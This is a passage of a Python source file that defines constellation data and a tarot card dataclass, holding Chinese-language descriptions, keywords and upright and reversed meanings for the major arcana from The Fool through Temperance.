name='地球'), init=False) moon: Constellation = field(default=Element(id=-10, orig_name='Moon', name='月亮'), init=False) venus: Constellation = field(default=Element(id=-2, orig_name='Venus', name='金星'), init=False) mercury: Constellation = field(default=Element(id=-1, orig_name='Mercury', name='水星'), init=False) sun: Constellation = field(default=Element(id=0, orig_name='Sun', name='太阳'), init=False) aries: Constellation = field(default=Element(id=1, 
orig_name='Aries', name='白羊座'), init=False) taurus: Constellation = field(default=Element(id=2, orig_name='Taurus', name='金牛座'), init=False) gemini: Constellation = field(default=Element(id=3, orig_name='Gemini', name='双子座'), init=False) cancer: Constellation = field(default=Element(id=4, orig_name='Cancer', name='巨蟹座'), init=False) leo: Constellation = field(default=Element(id=5, orig_name='Leo', name='狮子座'), init=False) virgo: Constellation = field(default=Element(id=6, orig_name='Virgo', name='室女座'), init=False) libra: Constellation = field(default=Element(id=7, orig_name='Libra', name='天秤座'), init=False) scorpio: Constellation = field(default=Element(id=8, orig_name='Scorpio', name='天蝎座'), init=False) sagittarius: Constellation = field(default=Element(id=9, orig_name='Sagittarius', name='人马座'), init=False) capricorn: Constellation = field(default=Element(id=10, orig_name='Capricorn', name='摩羯座'), init=False) aquarius: Constellation = field(default=Element(id=11, orig_name='Aquarius', name='宝瓶座'), init=False) pisces: Constellation = field(default=Element(id=12, orig_name='Pisces', name='双鱼座'), init=False) @dataclass class TarotCards: """ 所有卡牌 每个属性都是一张牌 """ @classmethod def get_all_cards(cls) -> List[TarotCard]: """ 获取所有塔罗牌的列表 :return: List[TarotCard] """ return [field_.default for field_ in fields(cls) if field_.type == TarotCard] blank: TarotCard = field(default=TarotCard( id=-1, index='blank', type='special', orig_name='Blank', name='空白', intro='空白的卡面,似乎可以用来作为卡牌背面图案使用', words='', desc='', upright='', reversed='' ), init=False) the_fool: TarotCard = field(default=TarotCard( id=0, index='the_fool', type='major_arcana', orig_name='The Fool', name='愚者', intro='愚人穿着色彩斑斓的服装,头上戴顶象征成功的桂冠,无视于前方的悬崖,昂首阔步向前行。\n\n他左手拿着一朵白玫瑰,白色象征纯洁,玫瑰象征热情。他的右手则轻轻握着一根杖,象征经验的包袱即系于其上。那根杖可不是普通的杖,它是一根权杖,象征力量。愚人脚边有只小白狗正狂吠着,似乎在提醒他要悬崖勒马,又好像随他一同起舞。无论如何,愚人仍旧保持着欢欣的神色,望向遥远的天空而非眼前的悬崖,好像悬崖下会有个天使扥住他似的,他就这样昂首阔步地向前走。远方的山脉象征他前方未知的旅程,白色的太阳自始至终都目睹着愚人的一举一动──他从哪里来?他往何处去?他又如何回来?', words='流浪', 
desc='愚人牌暗示着你现在不顾风险而有所行动。\n\n愚人是一张代表自发性行为的牌,一段跳脱某种状态的日子,或尽情享受眼前日子的一段时光。对旅游而言,这是一张积极的牌,暗示你将会活在当下,并且会有和生命紧密结合的感觉。“每天都充实,乐趣便在其中”是一句很适合这张牌的古谚语。当你周遭的人都对某事提防戒慎,你却打算去冒这个险时,愚人牌可能就会出现。\n\n愚人暗示通往满足之路是经由自发的行动,而长期的计划则是将来的事。', upright='盲目的、有勇气的、超越世俗的、展开新的阶段、有新的机会、追求自我的理想、展开一段旅行、超乎常人的勇气、漠视道德舆论的。', reversed='过于盲目、不顾现实的、横冲直撞的、拒绝负担责任的、违背常理的、逃避的心态、一段危险的旅程、想法如孩童般天真幼稚的。' ), init=False) the_magician: TarotCard = field(default=TarotCard( id=1, index='the_magician', type='major_arcana', orig_name='The Magician (I)', name='魔术师', intro='魔术师高举拿着权杖的右手指向天,左手食指指向地,他本人就是沟通上天与地面的桥梁。他身前的桌上放着象征四要素的权杖、圣杯、宝剑与星币,同时也代表塔罗牌的四个牌组。他身穿的大红袍子象征热情与主动,白色内衫表示纯洁与智慧的内在。缠绕他腰间的是一条青蛇,蛇虽然经常象征邪恶,但在这里代表的是智慧与启发。魔术师头顶上有个倒8符号,代表无限。画面前方和上方的红玫瑰象征热情,白百合象征智慧。此时,万事齐备,魔术师可以开始进行他的新计划了。和愚人牌同样鲜黄色的背景,预示未来成功的可能。', words='创造', desc='魔术牌意味着:现在是展开新计划的好时机。\n\n魔术师这张牌意味这是个着手新事物的适当时机。对的时间、对的机会、对的动机,使你的努力值回票价。对于展开行动、实现计划而言,这正是一个良好时机。由于你已为实现计划扎下良好基础,所以新的冒险很可能会实现。清楚的方向感和意志力的贯彻,大大的提升了成功的可能性。', upright='成功的、有实力的、聪明能干的、擅长沟通的、机智过人的、唯我独尊的、企划能力强的、透过更好的沟通而获得智慧、运用智慧影响他人、学习能力强的、有教育和学术上的能力、表达技巧良好的。', reversed='变魔术耍花招的、瞒骗的、失败的、狡猾的、善于谎言的、能力不足的、丧失信心的、以不正当手段获取认同的。' ), init=False) the_high_priestess: TarotCard = field(default=TarotCard( id=2, index='the_high_priestess', type='major_arcana', orig_name='The High Priestess (II)', name='女祭司', intro='相较于上一张魔术师纯粹阳性的力量,女祭司表现的则是纯粹阴性的力量。她身穿代表纯洁的白色内袍,与圣母的蓝色外袍,静默端坐。胸前挂个十字架,象征阴阳平衡、与神合一。\n\n她头戴的帽子是由上弦月、下弦月和一轮满月所构成的,象征所有的处女神祇。手上拿着滚动条,象征深奥的智慧,其上的TORA字样,意为“神圣律法”,而滚动条卷起并半遮着,暗示此律法不为人所知。在她脚边的一轮新月,为她的内袍衣角所固定住,袍子并延伸到图面之外。女祭司两侧一黑一白的柱子,存在于圣经故事中所罗门王在耶路撒冷所建的圣殿中,黑白柱上的B与J字样,分别是Boas和Jachin的缩写,黑柱是阴而白柱是阳,两柱象征二元性,坐在中间的女祭司则不偏不倚,统合两者的力量。柱子上面的喇叭造型,代表女祭司敏锐的感受性,上面的百合花纹则象征纯洁与和平。两柱之间有帷幕遮着,帷幕上的石榴代表“阴”,棕榈代表“阳”。帷幕把后方的景色遮住了,仔细一看,依稀可见由水、山丘与的蓝天构成的背景。水象征情感与潜意识,这一片水平静无波,但其静止的表面下蕴藏深沉的秘密。整个图面呈现象征智慧的蓝色调,双柱的意象在后面的牌中重复出现。', words='智慧', 
desc='女祭司意味着:这是向内探索、沉思,或按兵不动的时刻。\n\n女祭司代表去思考可以导致实际结果的构想。这并不是一张代表具体事物的牌,而是一张代表可能性的牌。我们每个人都在我们的人生当中持续的耕耘和收获,而女祭司就是散播那些种子或理念的行动。\n\n女祭司暗示你应该要相信你的直觉,因为在这一点上,有些东西你可能看不见。高位的女祭司是一张代表精神和心灵发展的牌。它代表了向内心探索的一段时期,以便为你人生的下一个阶段播种,或者去消化你在肉体的层次上所处理的事情。', upright='纯真无邪的、拥有直觉判断能力的、揭发真相的、运用潜意识的力量、掌握知识的、正确的判断、理性的思考、单恋的、精神上的恋爱、对爱情严苛的、回避爱情的、对学业有助益的。', reversed='冷酷无情的、无法正确思考的、错误的方向、迷信的、无理取闹的、情绪不安的、缺乏前瞻性的、严厉拒绝爱情的。' ), init=False) the_empress: TarotCard = field(default=TarotCard( id=3, index='the_empress', type='major_arcana', orig_name='The Empress (III)', name='女皇', intro='体态丰腴的皇后坐在宝座上,手持象征地球的圆形手杖,戴着由九颗珍珠组成的项链,象征九颗行星,也代表金星维纳斯。皇后头冠由十二个六角星组成,象征十二星座与一年的十二个月。更进一步,六角星本身是由一个正三角形和倒三角形组成,分别代表火要素和水要素。除了头冠之外,她还戴着香桃木叶作成的头环,象征金星维纳斯。她身穿的宽松袍子上面画满象征多产的石榴,宝座下方则是个绘有金星符号的心形枕头。她前方的麦田已经成熟,代表丰饶与多产;后方则是茂密的丝柏森林,与象征生命力的瀑布河流。', words='丰收', desc='女皇牌暗示家庭和谐及稳定。\n\n简单言之,女皇可能意味着实现计划,或朝向计划的下一个自然步骤迈进,亦即你又向目标靠近了一步。女皇牌也可能暗示一趟乡野之旅,或是休息一阵子并重返大自然的怀抱,因为她四周围绕着自然的产物。透过亲近自然,现在是你重新平衡自己的时候。这张牌意味家庭状态的稳定与和谐,而这通常是透过把爱从思考当中,带往内心来达成的。', upright='温柔顺从的、高贵美丽的、享受生活的、丰收的、生产的、温柔多情的、维护爱情的、充满女性魅力的、具有母爱的、有创造力的女性、沈浸爱情的、财运充裕的、快乐愉悦的。', reversed='骄傲放纵的、过度享乐的、浪费的、充满嫉妒心的、母性的独裁、占有欲、败家的女人、挥霍无度的、骄纵的、纵欲的、为爱颓废的、不正当的爱情、不伦之恋、美丽的诱惑。' ), init=False) the_emperor: TarotCard = field(default=TarotCard( id=4, index='the_emperor', type='major_arcana', orig_name='The Emperor (IV)', name='皇帝', intro='一国之尊的皇帝头戴皇冠,身着红袍,脚穿象征严格纪律的盔甲,左手拿着一颗球,右手持的是象征生命的古埃及十字架,自信满满的坐在王位上。\n\n王位上有四个牡羊头作为装饰,如图所示,皇帝牌正是代表牡羊座的牌。牡羊座是十二星座的头一个,具有勇敢、积极、有野心、有自信的特质。红袍加上橙色的背景,呈现红色的主色调,与牡羊座的特性不谋而合。背景严峻的山象征前方险峻的路途。我们可以比较皇帝与皇后的背景,一个是严峻山川,一个是丰饶大地,形成互补的局面。', words='支配', desc='皇帝表示一种训练和实际致力于生活。\n\n皇帝意味透过自律和实际的努力而达到成功。它可以代表你生活中一段相当稳定,且井然有序的时光。这张牌可以暗示遭遇到法律上的问题,或是碰到某个地位、权利都在你之上的人,例如法官、警员、父亲,或具有父亲形象的人。\n\n为了成功,现在正是你采取务实态度来面对人生的时候。你被周遭的人设下种种限制,但只要你能在这些限制之内努力的话,你还是可以达成你的目标。', upright='事业成功、物质丰厚、掌控爱情运的、有手段的、有方法的、阳刚的、独立自主的、有男性魅力的、大男人主义的、有处理事情的能力、有点独断的、想要实现野心与梦想的。', reversed='失败的、过于刚硬的、不利爱情运的、自以为是的、权威过度的、力量减弱的、丧失理智的、错误的判断、没有能力的、过于在乎世俗的、权力欲望过重的、权力使人腐败的、徒劳无功的。' ), init=False) the_hierophant: TarotCard = 
field(default=TarotCard( id=5, index='the_hierophant', type='major_arcana', orig_name='The Hierophant (V)', name='教皇', intro='教皇身穿大红袍子,端坐在信众前。他头戴象征权力的三层皇冠,分别代表身心灵三种层次的世界。\n\n他的右手食中指指向天,象征祝福﹔左手持着主字形的权杖,象征神圣与权力。他耳朵旁边垂挂的白色小物,代表内心的声音。教皇前方放着两把交叉的钥匙,在很多版本的塔罗牌里,钥匙是金色银色各一把,象征阳与阴,日与月,外在与内在,我们的课题就是要学会如何结合两者,而钥匙本身可用以开启智慧与神秘之门。教皇前方的两位信众,左边的身穿象征热情的红玫瑰花纹衣裳,右边则穿象征性灵成长的白百合衣裳(红玫瑰与白百合在魔术师也曾出现过)。教皇与信众三人的衣服都有牛轭形(Y字形)装饰,牛轭的用途是促使受过训练的动物去工作的,出现在教皇牌的道理值得深思。教皇后方则是曾经在女祭司中出现的两根柱子,不过在这里它们是灰色的,灰色象征由经验而来的智慧﹔另一说则是教皇后方虽无女祭司的帷幕将潜意识隔离,但暗沉的灰色代表通往潜意识之路仍未开启。柱子上的图案象征肉体结合。', words='援助', desc='教皇代表需要为你的心灵成长,及人生方向付起责任。\n\n教皇暗示你向某人或某个团体的人屈服了。或许这正是你为自己,及心灵上的需求负起责任的时刻了。你目前的行事作风并非应付事情的唯一方式,假设你愿意加以探索的话,或许你就会找到新的可能。', upright='有智慧的、擅沟通的、适时的帮助、找到真理、有精神上的援助、得到贵人帮助、一个有影响力的导师、找到正确的方向、学业出现援助、爱情上出现长辈的干涉、媒人的帮助。', reversed='过于依赖的、错误的指导、盲目的安慰、无效的帮助、独裁的、疲劳轰炸的、精神洗脑的、以不正当手段取得认同的、毫无能力的、爱情遭破坏、第三者的介入。' ), init=False) the_lovers: TarotCard = field(default=TarotCard( id=6, index='the_lovers', type='major_arcana', orig_name='The Lovers (VI)', name='恋人', intro='恋人牌背景在伊甸园,亚当与夏娃分站两边,两者皆裸身,代表他们没什么需要隐藏的。两人所踩的土地相当肥沃,生机盎然。\n\n夏娃的背后是知识之树,生有五颗苹果,象征五种感官,有条蛇缠绕树上。蛇在世界文化中的象征丰富多元,此处可能象征智慧,也象征欲望与诱惑。牠由下往上缠绕在树上,暗示诱惑经常来自潜意识。亚当背后是生命之树,树上有十二团火焰,象征十二星座,也象征欲望之火。伟特说:“亚当与夏娃年轻诱人的躯体,象征未受有形物质污染之前的青春、童贞、纯真和爱”。两人背后的人物是风之天使拉斐尔(Raphael),风代表沟通,祂身穿的紫袍则是忠贞的象征,显示这个沟通的重要性。亚当看着夏娃,夏娃则望着天使,象征“意识─潜意识─超意识”与“身─心─灵”或是“理性─感性”之间的传导。天使之下,亚当夏娃中间有一座山,象征意义解读众多,主要有三种:一说是山代表阳性,水代表阴性,两者表现阴阳平衡,意味我们必须把阴与阳、理性与感性的能量调和。一说认为这座山象征正当思想的丰饶果实。另一说则认为它代表高峰经验与极乐。', words='结合', desc='恋人牌意味,为了爱的关系而做的某些决定。\n\n恋人是一张代表决定的牌,而且除非问的是某个特定的问题,否则它通常是指有关两性关系的决定。它可能是在描述沉浸在爱恋之中的过程,因为它可以意指一段两性关系中的最初,或者是罗曼蒂克的阶级。恋人牌也可以形容在决定到底要保留就有的关系,或转进新关系当中。它暗示你已经由过去经验而得到成长了,因此你可以安全的迈向一个新的阶段。', upright='爱情甜蜜的、被祝福的关系、刚萌芽的爱情、顺利交往的、美满的结合、面临工作学业的选择、面对爱情的抉择、下决定的时刻、合作顺利的。', reversed='遭遇分离、有第三者介入、感情不合、外力干涉、面临分手状况、爱情已远去、无法结合的、遭受破坏的关系、爱错了人、不被祝福的恋情、因一时的寂寞而结合。' ), init=False) the_chariot: TarotCard = field(default=TarotCard( id=7, index='the_chariot', type='major_arcana', orig_name='The Chariot (VII)', name='战车', 
intro='一位英勇的战士驾着一座由两只人面狮身兽拉着的战车。人面狮身兽一只是黑的,代表严厉,另一只是白的,代表慈悲。两兽同时来看,也是阴阳平衡的象征。\n\n战车上有四根柱子(四个代表上帝的希伯来字母YHWH或火水风土四要素)支撑着蓝色车棚,车棚上饰以六角星花纹,象征天体对战士成功的影响。英勇的战士手持象征意志与力量的矛形权杖,头戴象征统治的八角星头冠和象征胜利的桂冠,身穿盔甲。盔甲上的肩章呈现弦月形,显示战车牌与属月亮的巨蟹座之关联。斜挂的腰带上有占星学符号,裙上有各种炼金术的符号。胸前的四方形图案代表土要素,象征意志的力量。战车前方的翅膀图案是古埃及的图腾,代表灵感。翅膀下面是一个小盾牌,其上的红色的图案是一种印度图腾,为男性与女性生殖器结合的象征,也是二元性与一元性,类似中国的阴与阳,可能暗示编号七的战车牌走过愚人之旅的三分之一,已达性成熟的阶段。战士身后的河流就是圣经创世纪中四条伊甸园之河其中的一条,与皇后、皇帝和、死神牌中的河是同一条。再后面就是一座高墙耸立的城市。战士背对城市,暗示他把物质置于身后,向前开展心灵上的旅程。他手上没有缰绳,表示他不是用肉体来控制那两头朝不同方向行进的人面狮身兽,而完全凭借他旺盛过人的意志力。值得注意的一点是他站在城墙外守御,而非进攻,所以这位战士是位守护者、防御者,而不是侵略者。他是尽他的本分,并努力做到最好。', words='胜利', desc='战车牌意味训练有素的心智。\n\n战车可以代表一部车,或是坐车旅行。当这张牌出现时,它可能意味着你需要控制生命中互相对抗的力量。目前的情况可能会出现某些矛盾,而你正以理智在控制着它们。\n\n这是一张代表由于坚持而取得成功的牌。如果用来形容一个人的话,战车是暗示这个人(通常是指男人),掌控着她自己和周遭的事物。正立的战车也可能意指一桩重要的生意,或意义重大的成功。', upright='胜利的、凯旋而归的、不断的征服、有收获的、快速的解决、交通顺利的、充满信心的、不顾危险的、方向确定的、坚持向前的、冲劲十足的。', reversed='不易驾驭的、严重失败、交通意外、遭遇挫折的、遇到障碍的、挣扎的、意外冲击的、失去方向的、丧失理智的、鲁莽冲撞的。' ), init=False) strength: TarotCard = field(default=TarotCard( id=8, index='strength', type='major_arcana', orig_name='Strength (VIII)', name='力量', intro='代表力量的女人轻柔地合上狮子的嘴。女人头上有魔术师牌中出现的倒8符号,象征她的力量是无穷尽的。她头上戴着花环,腰间也系着花环,而且腰间花环还连系在狮子颈间,形成第二个倒8符号。狮子身体微倾,尾巴轻垂,表现出彻底的顺服,还伸出舌头来舔着女人的手。', words='意志', desc='力量牌暗示你拥有足够的内在力量去面对人生。\n\n这张力量牌意味你有能力面对生活和困难的环境,或者有能力以希望、内在力量及勇气去做改变。勇气并不代表你没有恐惧,而是虽然你有恐惧,你还是愿意对某人或某事有所承诺。\n\n这张牌象征你拥有内在的力量来面对你内在的恐惧和欲望,而非让它们屈服于你的意志。在健康的分析方面,这张牌可能是有关心脏或脊椎方面的毛病,不过这些毛病也可以透过内在能量来克服,而且这张牌也暗示你本身拥有这种能量。', upright='内在的力量使成功的、正确的信心、坦然的态度、以柔克刚的力量、有魅力的、精神力旺盛、有领导能力的、理性的处理态度、头脑清晰的。', reversed='丧失信心的、失去生命力的、沮丧的、失败的、失去魅力的、无助的、情绪化的、任性而为的、退缩的、没有能力处理问题的、充满负面情绪的。' ), init=False) the_hermit: TarotCard = field(default=TarotCard( id=9, index='the_hermit', type='major_arcana', orig_name='The Hermit (IX)', name='隐者', intro='身穿灰色斗篷和帽子的老人站在冰天雪地的山巅上,低头沉思,四周渺无人烟。他右手高高举着一盏灯,这是真理之灯,灯里是颗发亮的六角星,名称是所罗门的封印,散发出潜意识之光。老人左手拄着一根族长之杖,这跟杖在愚人、魔术师、战车都曾经出现过。愚人太过天真,不知杖的魔力,拿它来系包袱;魔术师用代表意识的右手运用杖的法力;战车把杖化为矛,也用右手紧握着;隐士则杖交左手,用以在启蒙之路上做前导。', words='探索', 
desc='隐士牌暗示着:省思的一段时间。\n\n隐士牌暗示一段反省的时间。它代表着一段想要让你的过去、现在,以及未来成为有意义的时间。这张牌代表去看咨商辅导员、持续一段梦想之旅,或为了开发你自己的沉思。它也代表成熟,以及你已经知道生命中真正重要的是什么。\n\n它可能意味着得到身体或心灵上的协助及智因;或是你帮助其他人发现人生理解及事件的导因。它也代表一段时间内,你会问自己如下的问题:我从何处来?我现在位于何处?又将往何处去?', upright='有骨气的、清高的、有智慧的、有法力的、自我修养的,生命的智慧情境、用智慧排除困难的、给予正确的指导方向、有鉴赏力的、三思而后行的、谨慎行动的。', reversed='假清高的、假道德的、没骨气、没有能力的、内心孤独寂寞的、缺乏支持的、错误的判断、被排挤的、没有足够智慧的、退缩的、自以为是的、与环境不合的。' ), init=False) wheel_of_fortune: TarotCard = field(default=TarotCard( id=10, index='wheel_of_fortune', type='major_arcana', orig_name='Wheel of Fortune (X)', name='命运之轮', intro='所有的大牌都有人物,命运之轮是唯一的例外,可见这张牌独树一格。深蓝色的天空悬着一个轮子,轮盘由三个圆圈构成(教宗的头冠也是),最里面的小圈代表创造力,中间是形成力,最外层是物质世界。小圈里头没有任何符号,因为创造力潜能无限;中间圆圈里有四个符号,从上方顺时针依序是炼金术中的汞风、硫、水,分别与风火水土四要素相关联,是形成物质世界的基本要素﹔最外层就是物质世界,上右下左四方位分别是TARO四个字母,这四个字母可以组成Rota(轮)、Orat(说)、Tora(律法)、Ator(哈扥尔女神),形成一个完整的句子“塔罗之轮述说哈扥尔女神的律法”,其余四个符号是希伯来字母YHVH,是上帝最古老的名字。轮盘从中心放射出八道直线,代表宇宙辐射能量。\n\n在轮盘左方有一条往下行进的蛇,是埃及神话中的邪恶之神Typhon,牠的向下沉沦带着轮子进入分崩离析的黑暗世界。相反的,背负轮盘的胡狼头动物渴求上升,牠是埃及神话中的阿努比神(Anubis)。而上方的人面狮身兽是智慧的象征,均衡持中,在变动中保持不变。牠拿着的宝剑代表风要素,表示心智慧力、思考力和智慧。\n\n四个角落的四只动物,从右上方顺时针看分别是老鹰、狮子、牛、人,而且他们都有翅膀。这四个动物出自圣经启示录第四章“宝座周围有四个活物,前后遍体都满了眼睛。第一个活物像狮子,第二个像牛犊,第三个脸面像人,第四个像飞鹰”,耶路撒冷圣经提到四活物象征四位福音书的作者(马太、马可、路加和约翰)。在占卜上这四个动物与占星学产生关联,分别代表四个固定星座和四要素,老鹰是天蝎座(水),狮子是狮子座(火),牛是金牛座(土),人是水瓶座(风)。牠们都在看书,汲取智慧,而翅膀赋予牠们在变动中保持稳定的能力。', words='轮回', desc='命运之轮意味着你境遇的改变。观察这个改变,并留意它的模式。\n\n生命是变化无常的,当牌面上的命运之轮是正立时,改变似乎是有利的;而当它倒立时,改变又似乎是有害的。它只是改变,而似乎有害的改变,事实上可能会是一种祝福。你必须超越现状,将眼光放远,来观察生命的消长。\n\n通常命运之轮象征你生命境遇的改变。或许你并不了解这些改变的原因,不过在这里,你如何因应改变是比较重要的。你要迎接生命所提供给你的机会,还是要抗拒改变呢?此牌正立时就是在告诉你,要去适应这些改变。', upright='忽然而来的幸运、即将转变的局势、顺应局势带来成功、把握命运给予的机会、意外的发展、不可预测的未来、突如其来的爱情运变动。', reversed='突如其来的厄运、无法抵抗局势的变化、事情的发展失去了掌控、错失良机、无法掌握命运的关键时刻而导致失败、不利的突发状况、没有答案、被人摆布、有人暗中操作。' ), init=False) justice: TarotCard = field(default=TarotCard( id=11, index='justice', type='major_arcana', orig_name='Justice (XI)', name='正义', 
intro='一个女人端坐在石凳上,右手持剑高高举起,左手在下拿着天秤。身穿红袍,头戴金冠,绿色披肩用一个方形扣子扣起。她的右脚微微往外踏出,似乎想站起来,而左脚仍隐藏在袍子里面。她高举宝剑,象征她的决心。宝剑不偏不倚,象征公正,且智慧可以戳破任何虚伪与幻象。宝剑两面都有刃,可行善可行恶,端看个人选择。左手的金色天秤和披肩的绿色都是天秤座的象征。手持天秤表示她正在评估,正要下某个决定,同时追求平衡。胸前的方形扣子中间是个圆形,象征四要素的调和。头上的金冠中心有个四方形宝石,加上金冠的三个方顶,加起来得到数字七,代表金星,也就是天秤座的守护星。后方是个紫色帷幕,象征隐藏的智慧。两边柱子象征正面和负面的力量。', words='均衡', desc='正义意味,这是一段你为你的人生决定负起责任的时光。\n\n正义意味事情已经达成它应有的使命。也就是说,你过往的决定或行为已经引导你走到了目前的境遇。你已经得到你应得的了,如果你对自己是够诚实的话,你肯定知道这点。它代表你应该对自己,以及周遭的人绝对的诚实。你应该自己,以及使你成为今天这个样子的种种决定负起责任。你的未来可能会因为你目前的决定、行为或理解而改变。', upright='明智的决定、看清了真相、正确的判断与选择、得到公平的待遇、走向正确的道路、理智与正义战胜一切、维持平衡的、诉讼得到正义与公平、重新调整使之平衡、不留情面的。', reversed='错误的决定、不公平的待遇、没有原则的、缺乏理想的、失去方向的、不合理的、存有偏见的、冥顽不灵的、小心眼、过于冷漠的、不懂感情的。' ), init=False) the_hanged_man: TarotCard = field(default=TarotCard( id=12, index='the_hanged_man', type='major_arcana', orig_name='The Hanged Man (XII)', name='倒吊人', intro='倒吊人图案简单,涵义却深远。我们看到一个男人在一棵T字形树上倒吊着。他两手背在背后,形成一个三角形。两腿交叉形成十字。十字和三角形结合在一起,就是一个炼金符号,象征伟大志业的完成,也象征低层次的欲望转化到高层次的灵魂(炼成黄金)。\n\n红裤子象征身心灵中的“身”,也就是人类的欲望和肉体。蓝上衣即身心灵中的“心”,象征知识。他的金发和光环象征智慧和心灵的进化,也就是“灵”。金色的鞋子则象征倒吊人崇高的理想。在某些版本的塔罗牌中,倒吊人就是神话中的奥丁(Odin),他身后的树就是北欧神话中的义格卓席尔巨树(Yggdrasil),也称作世界之树,由地狱(潜意识)开始生长,经过地面(意识),直达天庭(超意识)。还记得皇帝右手拿着一根象征生命的古埃及十字架吗?古埃及十字架代表希伯来的第十九个字母Tau,是属于世间的一个字母,而倒吊人倒吊的T字树,正是它的下半部,表示倒吊人仍然是入世的。', words='牺牲', desc='“以将有更美好的事物降临于你身上的信念,顺从于人生”是倒吊人这张牌所传达的讯息。\n\n倒吊人是一张代表投降的牌。它暗示,当你在这段期间内,透过对生命的顺从,并让它引领你到你需要去的地方,那么你便可以获益良多。\n\n倒吊人还是一张代表独立的牌。这段期间内,你应该顺着感觉走,或是接受自己,即使别人都认为你的方式很奇怪也不打紧。它也可能象征,经历了生命中一段艰难的时光后的心灵平静。\n\n现在不是挣扎的时候,静下来好好思考你过去的行为,以及未来的计划。这只是一个暂时的状态,只要你妥善的运用这段时间,对你应该是有好处的。让生命中的事物自然而然的发生,或许你会对结果感到惊喜。带着“会有更美好的事情临降,来取代你所捐弃的事物”的信念,顺从于人生。花点时间来观察潜伏于事件底下的生命潮流。生命会给你一段宁静的时光,远离世界的纷纷扰扰,所以善用这段时光将是明智之举。', upright='心甘情愿的牺牲奉献、以修练的方式来求道、不按常理的、反其道而行的、金钱上的损失、正专注于某个理想的、有坚定信仰的、长时间沈思的、需要沈淀的、成功之前的必经之道。', reversed='精神上的虐待、心不甘情不愿的牺牲、损失惨重的、受到亏待的、严重漏财的、不满足的、冷淡的、自私自利的、要求回报的付出、逃离綑绑和束缚、以错误的方式看世界。' ), init=False) death: TarotCard = field(default=TarotCard( id=13, index='death', type='major_arcana', orig_name='Death (XIII)', name='死神', 
intro='传统的死神牌,通常是由骷髅人拿着镰刀来代表,而伟特将死神的意象提升到更深一层的境界。\n\n最显眼的就是那位骑着白马的骷髅骑士。他身边有四个人,国王、主教、女人、小孩,象征无论是世俗或出世、男或女、老或少,都逃不过死亡这个自然现象。国王抗拒死亡,被骷髅骑士践踏过去﹔主教的权杖掉在地上,双手合十崇敬死亡﹔女人跪下,别过脸不忍看﹔小孩不懂死亡,好奇的望着骷髅骑士。其中主教可能就是编号五的教宗牌,他掉落在地上的权杖象征世俗权力遇到死亡时毫无用处,仔细一看权杖顶似乎有三层圆圈,和教宗牌戴在头上的权冠相同,而主教头上戴的帽子状似尖尖的鱼头,代表双鱼世纪的结束,也可能暗示死神牌关联的希伯来文Nun,意思是鱼。跪着的女人可能是力量牌中的那位女性,她们的衣着与头冠都极为相似。再回到骷髅骑士,他头上那根红羽毛和愚人所戴的是同一根,他的旗帜是黑色背景,象征光芒的不存,上面五瓣蔷薇的图案是蔷薇十字会的图腾,关于此图腾的说法众多,可能是代表随着死亡而来的新生,另一说是象征火星与生命力,还有一说是象征美丽纯洁与不朽。远方的河流就是流经伊甸园的四条河流之一,称为冥河(Styx),象征川流不息的生命循环。河上有艘船,船的上方有个类似洞穴的地方,右方有个箭头(在死神的脚跟处)指向洞穴,这个洞穴可能是“神曲”一书中但丁前往阴间的通道,而牌中右方一条小径通往两座塔中(月亮和节制都有相同背景,这两座塔也可能是女祭司背后的柱子),代表通往新耶路撒冷的神秘旅程。象征永生的朝阳在两座塔间升起,似乎在告诉我们死亡并不是一切的终点。', words='结束', desc='死亡牌意味某种状况的结束。\n\n死亡为旧事物画上休止符,并让路给新事物。死亡牌代表改变的一段其间。我们可以这样说,生命中的某个章节就要结束了,而你对这份改变的接纳,将是变化自然而然地发生。\n\n抱持着“生命将会带来某些比它从你身上拿走的更美好的东西”的信念。在潜意识中,你或许也在渴望改变的发生,死亡牌即意味着改变正要出现。不要抗拒这份改变,试着去接纳它吧。', upright='必须结束旧有的现状、面临重新开始的时刻到了、将不好的过去清除掉、专注于心的开始、挥别过去的历史、展开心的旅程、在心里做个了结、激烈的变化。', reversed='已经历经了重生阶段了、革命已经完成、挥别了过去、失去了、结束了、失败了、病了、走出阴霾的时刻到了、没有转圜余地了。' ), init=False) temperance: TarotCard = field(default=TarotCard( id=14, index='temperance', type='major_arcana', orig_name='Temperance (XIV)', name='节制', intro='十四号的节制牌,出现在死神牌之后。大天使麦可手持两个金杯,把左手杯中的水倒入右手杯中。\n\n金发的天使身着白袍,背长红翅膀,胸前有个方形图案(地元素),中间是个橘色的三角形(火元素),同样的图案在正义牌中也可看到。天使头上则戴个饼图案,中间有一个小点,是炼金术中代表黄金的符号,也就是终极目标。天使脸上闪耀着和谐的光辉,怡然自在,他/她的右脚踏入象征潜意识的池塘中,左脚站在象征显意识的岸边石头上,代表两者之间的融合。塘边生长一丛爱丽斯花。远方有一条小径通往淡蓝色的两座山间,双山顶间闪耀着王冠般的金色光芒,类似如此的图像也曾出现于前一张死神牌中的小径、双塔与朝阳。恋人与审判牌中也有天使的出现。另外,大天使对应希腊神话中的彩虹之神,暴风雨后的彩虹,意味着节制牌已经从死神带给我们的恐惧中超脱出来了。整张牌带给人宁静祥和的感受,让人们明白死亡之后终获新生。', words='净化', desc='节制代表行动及感情的融合,带来内心的平静感觉。\n\n节制是一张代表行为,而非观念的牌。它代表对某种特定状况的适当行为。显示一种因为行为及情绪的结合,而带来内在平静的感觉。节制意味着结合自发性及知识的能力,运用精神的知识及理解力来调节行为的能力。它是指知道每种状况来临时,应该采取什么适当的反映或行为。\n\n节制牌暗示你较高层次的自我,和较低层次的自我可以和谐共存。你带着一种方向感行动,不管那是精神上或实质上的行动。它代表尽力而为,以达到你可以达到的境界。', upright='良好的疏导、希望与承诺、得到调和、有节制的、平衡的、沟通良好的、健康的、成熟与均衡的个性、以机智处理问题、从过去的错误中学习、避免重蹈覆辙、净化的、有技巧的、有艺术才能的。', reversed='缺乏能力的、技术不佳的、不懂事的、需反省的、失去平衡状态、沟通不良的、缺乏自我控制力、不确定的、重复犯错的、挫败的、受阻碍的、暂时的分离、希望与承诺遥遥无期。' ), 
